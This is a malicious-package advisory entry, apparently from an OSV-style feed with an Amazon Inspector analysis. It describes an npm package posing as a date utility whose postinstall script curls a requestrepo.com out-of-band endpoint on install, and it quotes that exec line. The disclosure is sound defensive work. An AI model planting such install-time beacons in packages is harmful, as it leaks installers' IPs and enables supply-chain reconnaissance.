MAL-2026-6390

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (99d23c8f1194f89f1b52e986cd57ca9c0fbd739a6565eb33c972f4fbaf0966e7) On `npm install`, the package's postinstall.js unconditionally executes `exec('curl http://qvmjcw4s.requestrepo.com')`, sending an HTTP callback to a unique subdomain on requestrepo.com — a public out-of-band HTTP/DNS interaction service commonly used to confirm successful code execution on a target. The callback discloses the installer's public IP and a successful-install signal to the listener controlled by whoever registered the subdomain. The package presents itself as a trivial date-formatting utility (`index.js` exports a one-line `formatDate`), with empty author metadata and a generic `A harmless utility package` description; there is no legitimate rationale for any install-time network I/O. The cover-story metadata combined with an unconditional install-time beacon to an OOB inspection endpoint matches the reconnaissance/dependency-confusion probe pattern.